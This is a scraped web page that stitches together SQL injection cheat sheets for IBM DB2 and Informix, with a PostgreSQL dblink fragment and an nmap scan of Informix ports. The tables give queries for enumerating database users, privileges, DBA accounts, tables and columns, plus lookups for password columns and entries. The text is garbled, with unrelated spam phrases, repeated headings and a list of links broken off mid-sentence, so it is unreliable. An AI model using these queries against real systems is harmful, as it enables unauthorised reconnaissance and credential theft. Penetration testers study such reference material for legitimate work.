Pentestmonkey Sql Injection Cheat Sheet



PentestMonkey’s Ingres SQL Injection Cheat Sheet; Pentestmonkey’s DB2 SQL Injection Cheat Sheet; Pentestmonkey’s Informix SQL Injection Cheat Sheet; SQLite3 Injection Cheat sheet; Ruby on Rails (Active Record) SQL Injection Guide; ForkBombers SQLMap Tamper Scripts Update; SQLi in INSERT worse than SELECT; Manual SQL Injection Tips; Second. However if contrib/dblinkis installed (it isn't by default) it can be used to resolve hostnames (assuming you have DBA rights): SELECT. FROM dblink ('host=put.your.hostname.here user=someuser dbname=somedb', 'SELECT version ') RETURNS (result TEXT); Alternatively, if you have DBA rights you could run an OS-level command (see below) to resolve hostnames, e.g. 'ping pentestmonkey.

Finding a SQL injection vulnerability in a web application backed by DB2 isn’t too common in my experience. When you do find one, though it pays to be prepared…

Below are some tabulated notes on how to do many of thing you’d normally do via SQL injection. All tests were performed on DB2 8.2 under Windows.

This post is part of series of SQL Injection Cheat Sheets. In this series, I’ve endevoured to tabulate the data to make it easier to read and to use the same table for for each database backend. This helps to highlight any features which are lacking for each database, and enumeration techniques that don’t apply and also areas that I haven’t got round to researching yet.

Postgresql Sql Injection Cheat Sheet

The complete list of SQL Injection Cheat Sheets I’m working is:

I’m not planning to write one for MS Access, but there’s a great MS Access Cheat Sheet here.

Oracle sql injection cheat sheetPostgresql sql injection cheat sheet

Some of the queries in the table below can only be run by an admin. These are marked with “– priv” at the end of the query.

Versionselect versionnumber, version_timestamp from sysibm.sysversions;
Commentsselect blah from foo; — comment like this
Current Userselect user from sysibm.sysdummy1;
select session_user from sysibm.sysdummy1;
select system_user from sysibm.sysdummy1;
List UsersN/A (I think DB2 uses OS-level user accounts for authentication.)Database authorities (like roles, I think) can be listed like this:
select grantee from syscat.dbauth;
List Password HashesN/A (I think DB2 uses OS-level user accounts for authentication.)
List Privilegesselect * from syscat.tabauth; — privs on tables
select * from syscat.dbauth where grantee = current user;
select * from syscat.tabauth where grantee = current user;
select * from SYSIBM.SYSUSERAUTH – List db2 system privilegies
List DBA Accountsselect name from SYSIBM.SYSUSERAUTH where SYSADMAUTH = ‘Y’ or SYSADMAUTH = ‘G’
Current Databaseselect current server from sysibm.sysdummy1;
List DatabasesSELECT schemaname FROM syscat.schemata;
List Columnsselect name, tbname, coltype from sysibm.syscolumns;
List Tablesselect name from sysibm.systables;
Find Tables From Column Nameselect tbname from sysibm.syscolumns where name=’username’
Select Nth Rowselect name from (SELECT name FROM sysibm.systables order by
name fetch first N+M-1 rows only) sq order by name desc fetch first N rows only;
Select Nth CharSELECT SUBSTR(‘abc’,2,1) FROM sysibm.sysdummy1; — returns b
Bitwise ANDThis page seems to indicate that DB2 has no support for bitwise operators!
ASCII Value -> Charselect chr(65) from sysibm.sysdummy1; — returns ‘A’
Char -> ASCII Valueselect ascii(‘A’) from sysibm.sysdummy1; — returns 65
CastingSELECT cast(’123′ as integer) FROM sysibm.sysdummy1;
SELECT cast(1 as char) FROM sysibm.sysdummy1;
String ConcatenationSELECT ‘a’ concat ‘b’ concat ‘c’ FROM sysibm.sysdummy1; — returns ‘abc’
select ‘a’ || ‘b’ from sysibm.sysdummy1; — returns ‘ab’
If StatementTODO
Case StatementTODO
Avoiding QuotesTODO
Time Delay???See Heavy Queries article for some ideas.
Make DNS RequestsTODO
Command ExecutionTODO
Local File AccessTODO
Hostname, IP AddressTODO
Location of DB filesTODO
Default/System DatabasesTODO

This page will probably remain a work-in-progress for some time yet. I’ll update it as I learn more.

Thanks

Pentestmonkey gratefully acknowledges the contributions of:

r22mvk

Adrián for figuring out lots of the TODO items above:
http://securityetalii.es/2012/05/20/db2-sql-injection-cheat-sheet/

Tags: cheatsheet, database, db2, pentest, sqlinjection

Posted in SQL Injection


Some useful syntax reminders for SQL Injection into Informix databases…

Below are some tabulated notes on how to do many of thing you’d normally do via SQL injection. All tests were performed on Informix Dynamic Server Express Edition 11.5 for Windows. The Informix download page is here.

This post is part of series of SQL Injection Cheat Sheets. In this series, I’ve endevoured to tabulate the data to make it easier to read and to use the same table for for each database backend. This helps to highlight any features which are lacking for each database, and enumeration techniques that don’t apply and also areas that I haven’t got round to researching yet.

The complete list of SQL Injection Cheat Sheets I’m working is:

I’m not planning to write one for MS Access, but there’s a great MS Access Cheat Sheet here. Tn5250.

VersionSELECT DBINFO(‘version’, ‘full’) FROM systables WHERE tabid = 1;
SELECT DBINFO(‘version’, ‘server-type’) FROM systables WHERE tabid = 1;
SELECT DBINFO(‘version’, ‘major’), DBINFO(‘version’, ‘minor’), DBINFO(‘version’, ‘level’) FROM systables WHERE tabid = 1;
SELECT DBINFO(‘version’, ‘os’) FROM systables WHERE tabid = 1; — T=Windows, U=32 bit app on 32-bit Unix, H=32-bit app running on 64-bit Unix, F=64-bit app running on 64-bit unix
Commentsselect 1 FROM systables WHERE tabid = 1; — comment
Current UserSELECT USER FROM systables WHERE tabid = 1;
select CURRENT_ROLE FROM systables WHERE tabid = 1;
List Usersselect username, usertype, password from sysusers;
List Password HashesTODO
List Privilegesselect tabname, grantor, grantee, tabauth FROM systabauth join systables on systables.tabid = systabauth.tabid; — which tables are accessible by which users
select procname, owner, grantor, grantee from sysprocauth join sysprocedures on sysprocauth.procid = sysprocedures.procid; — which procedures are accessible by which users
List DBA AccountsTODO
Current DatabaseSELECT DBSERVERNAME FROM systables where tabid = 1; — server name
List Databasesselect name, owner from sysdatabases;
List Columnsselect tabname, colname, owner, coltype FROM syscolumns join systables on syscolumns.tabid = systables.tabid;
List Tablesselect tabname, owner FROM systables;
select tabname, viewtext FROM sysviews join systables on systables.tabid = sysviews.tabid;
List Stored Proceduresselect procname, owner FROM sysprocedures;
Find Tables From Column Nameselect tabname, colname, owner, coltype FROM syscolumns join systables on syscolumns.tabid = systables.tabid where colname like ‘%pass%’;
Select Nth Rowselect first 1 tabid from (select first 10 tabid from systables order by tabid) as sq order by tabid desc; — selects the 10th row
Select Nth CharSELECT SUBSTRING(‘ABCD’ FROM 3 FOR 1) FROM systables where tabid = 1; — returns ‘C’
Bitwise ANDselect bitand(6, 1) from systables where tabid = 1; — returns 0
select bitand(6, 2) from systables where tabid = 1; — returns 2
ASCII Value -> CharTODO
Char -> ASCII Valueselect ascii(‘A’) from systables where tabid = 1;
Castingselect cast(’123′ as integer) from systables where tabid = 1;
select cast(1 as char) from systables where tabid = 1;
String ConcatenationSELECT ‘A’ || ‘B’ FROM systables where tabid = 1; — returns ‘AB’
SELECT concat(‘A’, ‘B’) FROM systables where tabid = 1; — returns ‘AB’
String LengthSELECT tabname, length(tabname), char_length(tabname), octet_length(tabname) from systables;
If StatementTODO
Case Statementselect tabid, case when tabid>10 then “High” else ‘Low’ end from systables;
Avoiding QuotesTODO
Time DelayTODO
Make DNS RequestsTODO
Command ExecutionTODO
Local File AccessTODO
Hostname, IP AddressSELECT DBINFO(‘dbhostname’) FROM systables WHERE tabid = 1; — hostname
Location of DB filesTODO
Default/System DatabasesThese are the system databases:
sysmaster
sysadmin*
sysuser*
sysutils*

Oracle Sql Injection Cheat Sheet Pentestmonkey

* = don’t seem to contain anything / don’t allow readingInstalling Locally

You can download Informix Dynamic Server Express Edition 11.5 Trial for Linux and Windows.

Database ClientThere’s a database client SDK available, but I couldn’t get the demo client working.
I used SQuirreL SQL Client Version 2.6.8 after installing the Informix JDBC drivers (“emerge dev-java/jdbc-informix” on Gentoo).Logging in from command line

If you get local admin rights on a Windows box and have a GUI logon: English hymnal (uk, 1933)music for your church services.

  • Click: Start | All Programs | IBM Informix Dynamic Server 11.50 | someservername. This will give you a command prompt with various Environment variables set properly.
  • Run dbaccess.exe from your command prompt. This will bring up a text-based GUI that allows you to browse databases.

The following were set on my test system. This may help if you get command line access, but can’t get a GUI – you’ll need to change “testservername”:

My default installation listened on two TCP ports: 9088 and 9099. When I created a new “server name”, this listened on 1526/TCP by default. Nmap 4.76 didn’t identify these ports as Informix:

Pentestmonkey Sql Injection Cheat Sheet 2017

$ sudo nmap -sS -sV 10.0.0.1 -p- -v –version-all

1526/tcp open pdap-np?
9088/tcp open unknown
9089/tcp open unknown

TODO How would we identify Informix listening on the network?

Mysql Injection Cheat Sheet

Rn programs in tulsa download free, software. Tags: cheatsheet, database, informix

Pentestmonkey Net

Posted in SQL Injection

Pentestmonkey Sqli Cheat Sheet






Comments are closed.